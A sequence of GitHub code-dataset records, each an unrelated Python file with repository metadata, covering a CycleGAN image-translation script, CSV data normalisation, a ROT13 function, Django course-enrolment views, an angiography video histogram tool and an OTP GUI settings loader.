range(n_samples):\r\n\tplt.subplot(2, n_samples, 1 + i)\r\n\tplt.axis('off')\r\n\tplt.imshow(dataA[i].astype('uint8'))\r\n# plot target image\r\nfor i in range(n_samples):\r\n\tplt.subplot(2, n_samples, 1 + n_samples + i)\r\n\tplt.axis('off')\r\n\tplt.imshow(dataB[i].astype('uint8'))\r\nplt.show()\r\n\r\n\r\n\r\n# load image data\r\ndata = [dataA, dataB]\r\n\r\nprint('Loaded', data[0].shape, data[1].shape)\r\n\r\n#Preprocess data to change input range to values between -1 and 1\r\n# This is because the generator uses tanh activation in the output layer\r\n#And tanh ranges between -1 and 1\r\ndef preprocess_data(data):\r\n\t# load compressed arrays\r\n\t# unpack arrays\r\n\tX1, X2 = data[0], data[1]\r\n\t# scale from [0,255] to [-1,1]\r\n\tX1 = (X1 - 127.5) / 127.5\r\n\tX2 = (X2 - 127.5) / 127.5\r\n\treturn [X1, X2]\r\n\r\ndataset = preprocess_data(data)\r\n\r\nfrom cycleGAN_model import define_generator, define_discriminator, define_composite_model, train\r\n# define input shape based on the loaded dataset\r\nimage_shape = dataset[0].shape[1:]\r\n# generator: A -> B\r\ng_model_AtoB = define_generator(image_shape)\r\n# generator: B -> A\r\ng_model_BtoA = define_generator(image_shape)\r\n# discriminator: A -> [real/fake]\r\nd_model_A = define_discriminator(image_shape)\r\n# discriminator: B -> [real/fake]\r\nd_model_B = define_discriminator(image_shape)\r\n# composite: A -> B -> [real/fake, A]\r\nc_model_AtoB = define_composite_model(g_model_AtoB, d_model_B, g_model_BtoA, image_shape)\r\n# composite: B -> A -> [real/fake, B]\r\nc_model_BtoA = define_composite_model(g_model_BtoA, d_model_A, g_model_AtoB, image_shape)\r\n\r\nfrom datetime import datetime \r\nstart1 = datetime.now() \r\n# train models\r\ntrain(d_model_A, d_model_B, g_model_AtoB, g_model_BtoA, c_model_AtoB, c_model_BtoA, dataset, epochs=5)\r\n\r\nstop1 = datetime.now()\r\n#Execution time of the model \r\nexecution_time = stop1-start1\r\nprint(\"Execution time is: \", execution_time)\r\n\r\n############################################\r\n\r\n# Use the saved cyclegan models for image translation\r\nfrom instancenormalization import InstanceNormalization \r\nfrom keras.models import load_model\r\nfrom matplotlib import pyplot\r\nfrom numpy.random import randint\r\n\r\n# select a random sample of images from the dataset\r\ndef select_sample(dataset, n_samples):\r\n\t# choose random instances\r\n\tix = randint(0, dataset.shape[0], n_samples)\r\n\t# retrieve 
selected images\r\n\tX = dataset[ix]\r\n\treturn X\r\n\r\n# plot the image, its translation, and the reconstruction\r\ndef show_plot(imagesX, imagesY1, imagesY2):\r\n\timages = vstack((imagesX, imagesY1, imagesY2))\r\n\ttitles = ['Real', 'Generated', 'Reconstructed']\r\n\t# scale from [-1,1] to [0,1]\r\n\timages = (images + 1) / 2.0\r\n\t# plot images row by row\r\n\tfor i in range(len(images)):\r\n\t\t# define subplot\r\n\t\tpyplot.subplot(1, len(images), 1 + i)\r\n\t\t# turn off axis\r\n\t\tpyplot.axis('off')\r\n\t\t# plot raw pixel data\r\n\t\tpyplot.imshow(images[i])\r\n\t\t# title\r\n\t\tpyplot.title(titles[i])\r\n\tpyplot.show()\r\n\r\n# load dataset\r\nA_data = resample(dataA_all, \r\n replace=False, \r\n n_samples=50, \r\n random_state=42) # reproducible results\r\n\r\nB_data = resample(dataB_all, \r\n replace=False, \r\n n_samples=50, \r\n random_state=42) # reproducible results\r\n\r\nA_data = (A_data - 127.5) / 127.5\r\nB_data = (B_data - 127.5) / 127.5\r\n\r\n\r\n# load the models\r\ncust = {'InstanceNormalization': InstanceNormalization}\r\nmodel_AtoB = load_model('monet2photo_models/g_model_AtoB_005935.h5', cust)\r\nmodel_BtoA = load_model('monet2photo_models/g_model_BtoA_005935.h5', cust)\r\n\r\n# plot A->B->A (Monet to photo to Monet)\r\nA_real = select_sample(A_data, 1)\r\nB_generated = model_AtoB.predict(A_real)\r\nA_reconstructed = model_BtoA.predict(B_generated)\r\nshow_plot(A_real, B_generated, A_reconstructed)\r\n# plot B->A->B (Photo to Monet to Photo)\r\nB_real = select_sample(B_data, 1)\r\nA_generated = model_BtoA.predict(B_real)\r\nB_reconstructed = model_AtoB.predict(A_generated)\r\nshow_plot(B_real, A_generated, B_reconstructed)\r\n\r\n##########################\r\n#Load a single custom image\r\ntest_image = load_img('monet2photo/sunset256.jpg')\r\ntest_image = img_to_array(test_image)\r\ntest_image_input = np.array([test_image]) # Convert single image to a batch.\r\ntest_image_input = (test_image_input - 127.5) / 127.5\r\n\r\n# plot B->A->B (Photo to Monet to Photo)\r\nmonet_generated = model_BtoA.predict(test_image_input)\r\nphoto_reconstructed = model_AtoB.predict(monet_generated)\r\nshow_plot(test_image_input, monet_generated, photo_reconstructed)\r\n\r\n","repo_name":"bnsreenu/python_for_microscopists","sub_path":"253_254_cycleGAN_monet2photo/254-cycleGAN_monet2photo.py","file_name":"254-cycleGAN_monet2photo.py","file_ext":"py","file_size_in_byte":6224,"program_lang":"python","lang":"en","doc_type":"code","stars":3177,"dataset":"github-code","pt":"77"} +{"seq_id":"29732052917","text":"import numpy as np\n\ndata = np.genfromtxt(\"../data/dataset1.csv\", delimiter=\";\", usecols=[1, 2, 3, 4, 5, 6, 7], converters={5: lambda s: 0 if s == b\"-1\" else float(s), 7: lambda s: 0 if s == b\"-1\" else float(s)})\ndates = np.genfromtxt(\"../data/dataset1.csv\", delimiter=\";\", usecols=[0])\nlabels = []\nfor label in dates:\n\tif label < 20000301:\n\t\tlabels.append(\"winter\")\n\telif 20000301 <= label < 20000601:\n\t\tlabels.append(\"lente\")\n\telif 20000601 <= label < 20000901:\n\t\tlabels.append(\"zomer\")\n\telif 20000901 <= label < 20001201:\n\t\tlabels.append(\"herfst\")\n\telse: # from 01-12 to end of year\n\t\tlabels.append(\"winter\")\n\nfg_min = data[0][0]\nfg_max = data[0][0]\ntg_min = data[0][1]\ntg_max = data[0][1]\ntn_min = data[0][2]\ntn_max = data[0][2]\ntx_min = data[0][3]\ntx_max = data[0][3]\nsq_min = data[0][4]\nsq_max = data[0][4]\ndr_min = data[0][5]\ndr_max = data[0][5]\nrh_min = data[0][6]\nrh_max = data[0][6]\n\nfor date in data:\n\tif 
date[0] < fg_min:\n\t\tfg_min = date[0]\n\telif date[0] > fg_max:\n\t\tfg_max = date[0]\n\tif date[1] < tg_min:\n\t\ttg_min = date[1]\n\telif date[1] > tg_max:\n\t\ttg_max = date[1]\n\tif date[2] < tn_min:\n\t\ttn_min = date[2]\n\telif date[2] > tn_max:\n\t\ttn_max = date[2]\n\tif date[3] < tx_min:\n\t\ttx_min = date[3]\n\telif date[3] > tx_max:\n\t\ttx_max = date[3]\n\tif date[4] < sq_min:\n\t\tsq_min = date[4]\n\telif date[4] > sq_max:\n\t\tsq_max = date[4]\n\tif date[5] < dr_min:\n\t\tdr_min = date[5]\n\telif date[5] > dr_max:\n\t\tdr_max = date[5]\n\tif date[6] < rh_min:\n\t\trh_min = date[6]\n\telif date[6] > rh_max:\n\t\trh_max = date[6]\n\nfg_range = fg_max - fg_min\ntg_range = tg_max - tg_min\ntn_range = tn_max - tn_min\ntx_range = tx_max - tx_min\nsq_range = sq_max - sq_min\ndr_range = dr_max - dr_min\nrh_range = rh_max - rh_min\n\n\ndef normalise(date):\n\treturn [\n\t\t(date[0] - fg_min) / fg_range,\n\t\t(date[1] - tg_min) / tg_range,\n\t\t(date[2] - tn_min) / tn_range,\n\t\t(date[3] - tx_min) / tx_range,\n\t\t(date[4] - sq_min) / sq_range,\n\t\t(date[5] - dr_min) / dr_range,\n\t\t(date[6] - rh_min) / rh_range]\n\n\nnormalised_data = []\nfor date in data:\n\t# normalised_date = normalise(date)\n\tnormalised_data.append(normalise(date))\n\n# for n in range(0, len(dates)):\n# \tprint(dates[n], \":\", labels[n])\n\nvalidation_data = np.genfromtxt(\"../data/validation1.csv\", delimiter=\";\", usecols=[1, 2, 3, 4, 5, 6, 7], converters={5: lambda s: 0 if s == b\"-1\" else float(s), 7: lambda s: 0 if s == b\"-1\" else float(s)})\nvalidation_dates = np.genfromtxt(\"../data/validation1.csv\", delimiter=\";\", usecols=[0], converters={5: lambda s: 0 if s == b\"-1\" else float(s), 7: lambda s: 0 if s == b\"-1\" else float(s)})\nvalidation_labels = []\nfor label in validation_dates:\n\tif label < 20010301:\n\t\tvalidation_labels.append(\"winter\")\n\telif 20010301 <= label < 20010601:\n\t\tvalidation_labels.append(\"lente\")\n\telif 20010601 <= label < 20010901:\n\t\tvalidation_labels.append(\"zomer\")\n\telif 20010901 <= label < 20011201:\n\t\tvalidation_labels.append(\"herfst\")\n\telse: # from 01-12 to end of year\n\t\tvalidation_labels.append(\"winter\")\n\nnormalised_validation_data = []\nfor date in validation_data:\n\tnormalised_validation_data.append(normalise(date))\n\ntest_data = np.genfromtxt(\"../data/days.csv\", delimiter=\";\", usecols=[1, 2, 3, 4, 5, 6, 7], converters={5: lambda s: 0 if s == b\"-1\" else float(s), 7: lambda s: 0 if s == b\"-1\" else float(s)})\nnormalised_test_data = []\nfor date in test_data:\n\tnormalised_test_data.append(normalise(date))\n\n\nneural_network_data = np.genfromtxt(\"../data/bezdekIris.data\", delimiter=\",\", usecols=[0, 1, 2, 3])\nneural_network_classification = np.genfromtxt(\"../data/bezdekIris.data\", delimiter=\",\", usecols=[4], converters={4: lambda s: 0 if s == b\"Iris-setosa\" else 1 if s == b\"Iris-versicolor\" else 2 if s == b\"Iris-virginica\" else 3})\n","repo_name":"vasilishomegas/AAI-20","sub_path":"data/import_data.py","file_name":"import_data.py","file_ext":"py","file_size_in_byte":3673,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"8658218896","text":"import json\n\nfrom misc import *\nimport math as m\n\n\ndef std(data):\n s = sum(data)\n l = len(data)\n\n dif = sum(map(lambda x: m.pow(x - s/l, 2), data)) / l\n\n return m.sqrt(dif)\n\n\ndef validate_pilotset(data):\n apps_left = ctx.apps.copy()\n\n try:\n ps = json.loads(data)\n for p in ps:\n if p not in 
ctx.pilots:\n return False, 'pilot {} not found'.format(p)\n if ps[p] is None or len(ps[p]) <= 0:\n continue\n\n pilot = ctx.pilots[p]\n\n pilot.apps = list(filter(lambda app: app in ps[p], ctx.apps))\n for app in pilot.apps:\n if app not in apps_left:\n return False, 'app {} assigned to more than one pilot'.format(app)\n\n del apps_left[app]\n\n if len(apps_left) > 0:\n return False, 'some apps are not assigned to any pilot'\n\n # now calculate the score\n\n cons_l = []\n mem_l = []\n\n for pilot in ctx.pilots.values():\n pilot.cons = 0\n # do not reset pilot.srvs here\n\n for app in pilot.apps:\n pilot.cons += ctx.apps[app]\n pilot.srvs.update(ctx.appSrvs[app])\n\n # assume every node consumes MB_EACH_NODE megabytes of memory\n pilot.mem = sum(pilot.srvs.values()) * MB_EACH_NODE\n\n cons_l.append(pilot.cons)\n mem_l.append(pilot.mem)\n\n return True, (std(cons_l), std(mem_l), sum(mem_l))\n except Exception as e:\n return False, 'returned data does not meet requirements'\n","repo_name":"chierqj/AliMiddleware","sub_path":"score/valid.py","file_name":"valid.py","file_ext":"py","file_size_in_byte":1541,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"}{"seq_id":"29475905739","text":"def rot13(result):\n # result = input(\"Enter the word to encrypt: \")\n result = result.lower()\n var = \"abcdefghijklmnopqrstuvwxyz\"\n fun = var[13:]+var[:13]\n char = lambda c: fun[var.find(c)] if var.find(c)>-1 else c\n\n return ''.join( char(c) for c in result )\n\nprint(rot13('UANDRESBELLO'))\n
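# prints 'hnaqerforyyb' (ROT13 of the lowercased input)\n ","repo_name":"pabloschwarzenberg/grader","sub_path":"tema8_ej4/tema8_ej4_39276b734f207f9d35919eb772fe3b04.py","file_name":"tema8_ej4_39276b734f207f9d35919eb772fe3b04.py","file_ext":"py","file_size_in_byte":345,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"}{"seq_id":"72342107450","text":"from config import dbTolls\nfrom files_tolls import output_message\nfrom update_tables_options.db_tools import (\n get_table_id, get_table_number_quotes, get_distinct_attributes_for_table, get_values_attribute_for_table\n)\n\n\ndef get_db_attributes_for_table(db: dbTolls, table_short_name: str) -> dict[str: tuple[str, ...]] | None:\n \"\"\" For the table with the given short code, build a dictionary of unique attributes and their unique values,\n if those values vary among the quotes that belong to the table.\n \"\"\"\n table_id = get_table_id(db, table_short_name)\n if table_id is None:\n output_message(f\"table not found in the DB:\", f\"data: {table_short_name}\")\n return None\n quotes_number = get_table_number_quotes(db, table_id)\n if quotes_number is None:\n output_message(f\"failed to count the number of quotes\", f\"in the table with id: {table_id}\")\n return None\n attributes = get_distinct_attributes_for_table(db, table_id)\n if attributes is None:\n output_message(f\"in table {table_short_name} all {quotes_number} quotes\", f\"have no attributes at all\")\n return None\n variable_attributes = {}\n for attribute in attributes:\n attribute_values = get_values_attribute_for_table(db, attribute, table_id)\n if attribute_values and (len(attribute_values) < quotes_number\n or len(set(attribute_values)) > 1):\n variable_attributes[attribute] = tuple(set(attribute_values))\n # ic(attribute, variable_attributes[attribute])\n return variable_attributes\n\n\nif __name__ == '__main__':\n import os\n from icecream import ic\n\n db_path = r\"F:\\Kazak\\GoogleDrive\\Python_projects\\DB\"\n db_name = os.path.join(db_path, 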
\"quotes_test.sqlite3\")\n ic(db_name)\n\n table = (13, '2', '4.8-243')\n with dbTolls(db_name) as dbt:\n ua = get_db_attributes_for_table(dbt, table[2])\n ic(ua)\n","repo_name":"e2e4Konstantin/PSM_Parsing","sub_path":"update_tables_options/db_attributes.py","file_name":"db_attributes.py","file_ext":"py","file_size_in_byte":2192,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"21814199316","text":"#!/usr/bin/env python\n\n#\n#\n#\n#\n#\n\n#\n# IMPORT SOURCES:\n#\n#\n\n#\n# Get taxa from anatomical structure.\n#\n\n# PRE-CODE\nimport faulthandler\nfaulthandler.enable()\n\n# IMPORTS\n\n# Imports for recognizing modules.\nimport os\nimport sys\nsys.path.append(os.path.join(os.path.dirname(__file__), \"../../..\"))\n\n# Import modules.\nfrom gnomics.objects.user import User\nimport gnomics.objects.anatomical_structure\nimport gnomics.objects.taxon\n\n# Other imports.\nimport json\nimport requests\nimport timeit\n\n# MAIN\ndef main():\n anatomical_structure_taxon_unit_tests(\"UBERON_0003097\")\n \n# Get taxa.\ndef get_taxa(anatomical_structure, user=None):\n taxa_array = []\n ids_completed = []\n \n for iden in gnomics.objects.auxiliary_files.identifier.filter_identifiers(anatomical_structure.identifiers, [\"uberon\", \"uberon id\", \"uberon identifier\"]):\n if iden[\"identifier\"] not in ids_completed:\n \n ids_completed.append(iden[\"identifier\"])\n \n proc_id = iden[\"identifier\"]\n if \":\" in proc_id:\n proc_id = proc_id.replace(\":\", \"_\")\n \n base = \"http://kb.phenoscape.org/api/taxon/\"\n ext = \"with_phenotype?entity=%3Chttp%3A%2F%2Fpurl.obolibrary.org%2Fobo%2FBFO_0000050%3E%20some%20%3Chttp%3A%2F%2Fpurl.obolibrary.org%2Fobo%2F\" + str(proc_id) + \"%3E&quality=%3Chttp%3A%2F%2Fpurl.obolibrary.org%2Fobo%2FPATO_0000052%3E&parts=false&limit=20&offset=0&total=false\"\n\n r = requests.get(base+ext, headers={\"Content-Type\": \"application/json\"})\n\n if not r.ok:\n #r.raise_for_status()\n #sys.exit()\n print(\"Something went wrong.\")\n else:\n\n decoded = json.loads(r.text)\n for result in decoded[\"results\"]:\n vto_id = result[\"@id\"].split(\"/obo/\")[1]\n sci_name = result[\"label\"]\n\n temp_taxon = gnomics.objects.taxon.Taxon(identifier = vto_id, identifier_type = \"VTO ID\", source = \"Phenoscape Knowledgebase\")\n gnomics.objects.taxon.Taxon.add_identifier(temp_taxon, identifier = sci_name, identifier_type = \"Scientific Name\", language = \"la\", source = \"Phenoscape Knowledgebase\")\n taxa_array.append(temp_taxon)\n \n return taxa_array\n \n# UNIT TESTS\ndef anatomical_structure_taxon_unit_tests(uberon_id):\n uberon_anat = gnomics.objects.tissue.Tissue(identifier = uberon_id, identifier_type = \"UBERON ID\", source = \"Phenoscape Knowledgebase\")\n \n start = timeit.timeit()\n getting_taxa = get_taxa(uberon_anat)\n end = timeit.timeit()\n print(\"TIME ELAPSED: %s seconds.\" % str(end - start))\n print(\"\\nGetting taxon identifiers from UBERON identifier (%s):\" % uberon_id)\n for taxa in getting_taxa:\n for iden in taxa.identifiers:\n print(\"- %s (%s)\" % (str(iden[\"identifier\"]), iden[\"identifier_type\"]))\n\n# MAIN\nif __name__ == \"__main__\": main()","repo_name":"Superraptor/Gnomics","sub_path":"gnomics/objects/interaction_objects/anatomical_structure_taxon.py","file_name":"anatomical_structure_taxon.py","file_ext":"py","file_size_in_byte":2983,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"77"} +{"seq_id":"20689305875","text":"from django.shortcuts import 
render, redirect,reverse, get_object_or_404\nfrom .models import Course,Message,EnrollTime\nfrom .forms import NewCourse, NewPost, NewUser\nfrom django.contrib.auth.decorators import login_required, user_passes_test\nfrom django.contrib.auth.models import User,Group\nfrom datetime import datetime,timedelta\nfrom django.contrib import messages\n# Create your views here.\n\n\n'''Not views, just helper functions'''\ndef group(name,request):\n\treturn request.user.groups.filter(name=name).exists()\n\t\n\ndef is_professor(user):\n\treturn 'Professor' == user.groups.all()[0].name\n\ndef is_student(user):\n\treturn 'Student' == user.groups.all()[0].name\n\t\ndef is_admin(user):\n\treturn 'admin'== user.username\n\t\n\t\n\t\n'''Views'''\n\n\t\n@login_required\ndef home(request):\n\t'''Home page'''\n\n\tposts= Message.objects.exclude(timestamp__lt=(datetime.now()-timedelta(days=1)))\n\tcourses = Course.objects.all()\n\treturn render( \n\t\trequest, 'home.html' , \n\t\tcontext = { 'courses':courses , \n\t\t'student':group('Student',request),'professor':group('Professor',request),'posts':posts}\n\t)\n\n\n@login_required\n@user_passes_test(is_student,'home','')\ndef courses(request):\n\t'''Page with all the courses in which the student has enrolled'''\n\t\n\tcourses= Course.objects.filter(student__username=request.user.username)\n\treturn render( \n\t\trequest, \n\t\t'courses.html' , \n\t\tcontext = {'courses':courses,'student':group('Student',request)} \n\t)\n\t\n\n@login_required\t\ndef allcourses(request):\n\tcourses=Course.objects.all()\n\treturn render(\n\t\trequest, \n\t\t'allcourses.html',\n\t\tcontext = {'courses':courses,'student':group('Student',request),'professor':group('Professor',request)}\n\t)\n\t\n\n@login_required\t\ndef courseDetail(request,pk):\n\tcourse = get_object_or_404(Course,pk=pk)\n\tposts= Message.objects.filter(course=course)\n\t\n\tfull =(course.student.all().count()==course.limit)\n\t#If the user is a student\n\tif request.user.groups.all() and 'Student' == request.user.groups.all()[0].name:\n\t\n\t\tenrolled=request.user in course.student.all()\n\t\t#getting enroll time for the student if he is enrolled in the course\n\t\tif enrolled:\n\t\t\tenrollt=EnrollTime.objects.filter(relcourse=course).filter(stud=request.user)[0].enrolltime\n\t\telse:\n\t\t\tenrollt=datetime.now()\n\t\t\t\n\t\t#This queryset contains messages only after the enrollment time\n\t\tmsg_stud=Message.objects.filter(course=course).filter(timestamp__gt=enrollt)\n\t\t\n\t\treturn render(\n\t\t\trequest, \n\t\t\t'course_student.html',\n\t\t\tcontext = {'course':course,'enrolled':enrolled,'posts':msg_stud,'student':group('Student',request),'full':full}\n\t\t)\n\t\n\t#If the user is a professor\n\telse:\n\t\n\t\t#If he is the course professor\n\t\tif request.user == course.professor:\n\t\t\n\t\t\tif request.method==\"POST\":\n\t\t\t\tform=NewPost(request.POST)\n\t\t\n\t\t\t\tif form.is_valid():\n\t\t\t\t\ttitle=form.cleaned_data['title']\n\t\t\t\t\tcontent=form.cleaned_data['content']\n\t\t\t\t\t\n\t\t\t\t\tmessage=Message(title=title,content=content,course=request.user.courses)\n\t\t\t\t\tmessage.save()\n\t\t\t\t\t\n\t\t\t\t\tform=NewPost()\n\t\t\t\t\t\n\t\t\t\t\treturn redirect('course-detail',course.name)\n\t\t\t\t\t\n\t\t\telse:\n\t\t\t\tform = NewPost()\n\n\t\t\treturn render(\n\t\t\t\trequest,\n\t\t\t\t'course_professor.html',\n\t\t\t\t context={'form':form,'posts':posts,'course':course,'check':request.user == course.professor,'professor':True}\n\t\t\t)\n\t\t\t\n\t\t# If he is not the course professor\n\t\telse:\n\t\t\treturn 
render(\n\t\t\t\trequest , \n\t\t\t\t'course_professor.html',\t\t\t\t\n\t\t\t\tcontext={'course':course,'professor':True,}\n\t\t\t)\n\t\t\n\t\t\t\t\n#proxy view for enrolling into a course\n@login_required\n@user_passes_test(is_student,'home','')\ndef courseEnroll(request,pk):\n\tcourse = get_object_or_404(Course,pk=pk)\n\t\n\tcourse.student.add(request.user)\n\tcourse.save()\n\t\n\ttime=EnrollTime(stud=request.user,relcourse=course)\n\ttime.save()\n\treturn redirect( 'course-detail', course.name)\n\t\n\n#proxy view for dropping out of a course\n@login_required\t\n@user_passes_test(is_student,'home','')\ndef courseDrop(request,pk):\n\tcourse = get_object_or_404(Course,pk=pk)\n\t\n\tcourse.student.remove(request.user)\n\tcourse.save()\n\t\n\ttime=EnrollTime.objects.filter(relcourse=course).filter(stud=request.user)[0]\n\ttime.delete()\n\t\n\treturn redirect( 'course-detail', course.name)\n\n\n#proxy view for deleting a course\n@login_required\t\n@user_passes_test(is_professor,'home','')\ndef courseDelete(request,pk):\n\tcourse=get_object_or_404(Course,pk=pk)\n\tif course.professor==request.user:\n\t\tcourse.delete()\n\t\treturn redirect('new-course')\n\telse:\n\t\treturn redirect('home')\n\n\n@login_required\n@user_passes_test(is_professor,'home','')\ndef newCourse(request):\n\n\tif request.method=='POST':\n\t\tform=NewCourse(request.POST)\n\t\n\t\tif form.is_valid():\n\t\t\tname=request.POST.get('name')\n\t\t\tlimit=request.POST.get('limit')\n\t\t\t\n\t\t\tif Course.objects.filter(name=name).exists():\n\t\t\t\tform=NewCourse()\n\t\t\t\tcourse=Course.objects.filter(name=name).first()\n\t\t\t\tmessages.add_message(request,messages.ERROR, 'Course with this name has already been offered by '+course.professor.first_name+' '+course.professor.last_name)\n\t\t\t\treturn redirect('new-course')\n\t\t\telse:\n\t\t\t\tcourse=Course(name=name,professor=request.user,limit=limit)\n\t\t\t\tcourse.save()\n\t\t\t\tmessages.add_message(request,messages.INFO, 'Created a new course')\n\n\t\t\t\treturn redirect(\n\t\t\t\t\t'course-detail',\n\t\t\t\t\tcourse.name\n\t\t\t\t)\n\telse:\n\t\tform=NewCourse()\t\n\t\n\treturn render( \n\t\trequest, \n\t\t'new_course.html',\n\t\tcontext = {'form':form,'professor':True}\n\t)\n\t\n\n#proxy view for deleting a message\n@user_passes_test(is_professor,'home','')\ndef msgDelete(request,pk):\n\tmessage=get_object_or_404(Message,pk=pk)\n\tmessage.delete()\n\t\n\treturn redirect(\n\t\t'course-detail',\n\t\trequest.user.courses\n\t)\n\t\n\t\n\t\n#view for admin to create new user\n@user_passes_test(is_admin,'home','')\ndef newUser(request):\n\tif request.method==\"POST\":\n\t\tform=NewUser(request.POST)\n\t\tif form.is_valid():\n\t\t\tif not User.objects.filter(username=form.cleaned_data.get('username')).exists():\n\t\t\t\tuser=form.save()\n\t\t\t\tuser.refresh_from_db()\n\t\t\t\tgroup=Group.objects.get(name=form.cleaned_data.get('group'))\n\t\t\t\tfname=form.cleaned_data.get('fname')\n\t\t\t\tlname=form.cleaned_data.get('lname')\n\t\t\t\tuser.first_name=fname\n\t\t\t\tuser.last_name=lname\n\t\t\t\tgroup.user_set.add(user)\n\t\t\t\tuser.save()\n\t\t\t\tmessages.add_message(request,messages.INFO,'New User added')\n\t\t\t\treturn redirect(\n\t\t\t\t\t'home'\n\t\t\t\t\t)\n\t\t\t\n\t\t\telse:\n\t\t\t\treturn redirect('new-user')\n\t\telse:\n\t\t\treturn render(request,\n\t\t\t\t'new_user.html',\n\t\t\t\tcontext={'form':form}\n\t\t\t\t)\n\telse:\n\t\tform=NewUser()\n\t\treturn render( 
\n\t\t\trequest,\n\t\t\t'new_user.html',\n\t\t\tcontext={'form':form}\n\t\t\t)\n","repo_name":"lavishchauhan321/miniMoodle","sub_path":"MiniMoodle-master/moodle/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6389,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"}{"seq_id":"74620573047","text":"\"\"\"\r\nGregg Hebert – 1657892 – NSM - Undergraduate\r\nMubashir Khan - 1521657 - NSM - Undergraduate\r\nGeorge Coll Rodriguez - 1529011 – NSM – Undergraduate\r\n\r\nInstructions:\r\n- Make sure the two .mp4 files are in the same folder as this script.\r\n- Make sure all necessary libraries are installed.\r\n- Run the program.\r\n- Once the first video ends, it will close automatically.\r\n- Close the first histogram after you are done observing it by clicking the 'X' in the top right corner.\r\n- The second set of video and histogram will follow automatically.\r\n- Once the second video ends, it will close automatically.\r\n- Close the second histogram after you are done observing it by clicking the 'X' in the top right corner.\r\n- Two .png files of the histograms will be added to the folder after closing the last histogram.\r\n\r\nNote: press q at any time while the video is running to stop the script.\r\n\"\"\"\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport cv2\r\nimport time\r\n\r\n# parameters(the .mp4 video, number of frames in video (can be adjusted), type of perfusion(as string))\r\n\r\n\r\ndef getData(capture, numFrames, typePerfusion):\r\n i = 0\r\n x, y = [], []\r\n\r\n while True:\r\n (grabbed, frame) = capture.read()\r\n\r\n if not grabbed:\r\n break\r\n # Resize frame to width, if specified.\r\n if resizeWidth > 0:\r\n (height, width) = frame.shape[:2]\r\n resizeHeight = int(float(resizeWidth / width) * height)\r\n frame = cv2.resize(frame, (resizeWidth, resizeHeight),\r\n interpolation=cv2.INTER_AREA)\r\n\r\n # Normalize histograms based on number of pixels per frame.\r\n numPixels = np.prod(frame.shape[:2])\r\n\r\n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\r\n cv2.imshow(typePerfusion + ' Perfusion', gray)\r\n\r\n x.append(i/numFrames)\r\n\r\n # append the number of white pixels to array y\r\n y.append(np.count_nonzero(gray == 255))\r\n\r\n # plot in real-time with video\r\n ax.plot(x, y, color='b')\r\n fig.canvas.draw()\r\n\r\n i += 1\r\n\r\n if cv2.waitKey(1) & 0xFF == ord('q'):\r\n break\r\n\r\n capture.release()\r\n cv2.destroyAllWindows()\r\n fig.savefig(typePerfusion+'.png')\r\n plt.show()\r\n\r\n\r\ncapture1 = cv2.VideoCapture('Normal_Perfusion.mp4')\r\n\r\ncolor = 'gray'\r\ntypePerfusion = 'Normal'\r\n\r\n# rough estimate of number of frames/sec\r\nnumFrames = 15\r\n\r\n# set width - can be adjusted to fit your screen\r\nresizeWidth = 700\r\n\r\n# Label the plot axes and title\r\nfig = plt.figure(\"Angiography Normal Perfusion Histogram\")\r\nax = fig.add_subplot(111)\r\nax.set_title('Normal Perfusion')\r\nax.set_xlabel('Time (s)')\r\nax.set_ylabel('Signal Strength (px count)')\r\nfig.show()\r\ngetData(capture1, numFrames, typePerfusion)\r\n\r\ncapture2 = cv2.VideoCapture('Abnormal_Perfusion.mp4')\r\n\r\ncolor = 'gray'\r\ntypePerfusion = 'Abnormal'\r\nresizeWidth = 700\r\n\r\n# Label the plot axes and title\r\nfig = plt.figure(\"Angiography Abnormal Perfusion Histogram\")\r\nax = fig.add_subplot(111)\r\nax.set_title('Abnormal Perfusion')\r\nax.set_xlabel('Time (s)')\r\nax.set_ylabel('Signal Strength (px count)')\r\nfig.show()\r\n
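# Run the capture/plot loop for the abnormal-perfusion clip (same flow as above)\r\ngetData(capture2, numFrames, 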
typePerfusion)\r\n","repo_name":"gregghebert/Angiography_Simulator","sub_path":"Angiography_Simulator.py","file_name":"Angiography_Simulator.py","file_ext":"py","file_size_in_byte":3201,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"10297496890","text":"import yaml,gi,time,pyotp,subprocess,argparse,sys,os\ngi.require_version(\"Gtk\", \"3.0\")\ngi.require_version(\"Gdk\", \"3.0\")\nfrom gi.repository import Gdk,Gtk,GObject,GLib\nfrom otpversion import program_version\n\nclass OtpSettings:\n def __init__(self):\n homedir = os.environ[\"HOME\"]\n xdg_config_home = os.environ.get(\"XDG_CONFIG_HOME\",f\"{homedir}/.config\")\n otp_settings_home = xdg_config_home + \"/otpgui\"\n otp_settings_file = otp_settings_home + \"/settings.yml\"\n if not os.path.isdir(otp_settings_home):\n os.makedirs(otp_settings_home)\n if not os.path.isfile(otp_settings_file):\n self.otp_settings_data = {\"config_file\": f\"{otp_settings_home}/otp.yml\",\"encryption_method\": \"plain\"}\n with open(otp_settings_file, 'w') as f:\n yaml.dump(self.otp_settings_data, f)\n else:\n try:\n with open(otp_settings_file, 'r') as f:\n self.otp_settings_data = yaml.safe_load(f)\n except yaml.YAMLError as exc:\n print(f\"Cannot read settings file: {exc}\")\n self.otp_settings_data = None\n\n if not os.path.isfile(self.otp_settings_data['config_file']):\n default_config_file = {\"otp\": \n { \"default\":\n {\n \"name\": \"default tooltip\",\n \"genstring\":\"ABCDEFGHIJKLMNOP\"\n }\n }\n }\n with open(self.otp_settings_data['config_file'], 'w') as f:\n yaml.dump(default_config_file, f)\n\n def settings(self):\n return self.otp_settings_data\n\nclass OtpStore:\n def __init__(self,config_file,encryption_method):\n self.config_file = config_file\n self.sops_cmd = f\"sops -d --extract\"\n self.encryption_method=encryption_method\n try:\n with open(config_file, 'r') as file:\n config_yaml = yaml.safe_load(file)\n self.config_data = config_yaml['otp']\n self.otplist = sorted(config_yaml['otp'])\n except yaml.YAMLError as exc:\n 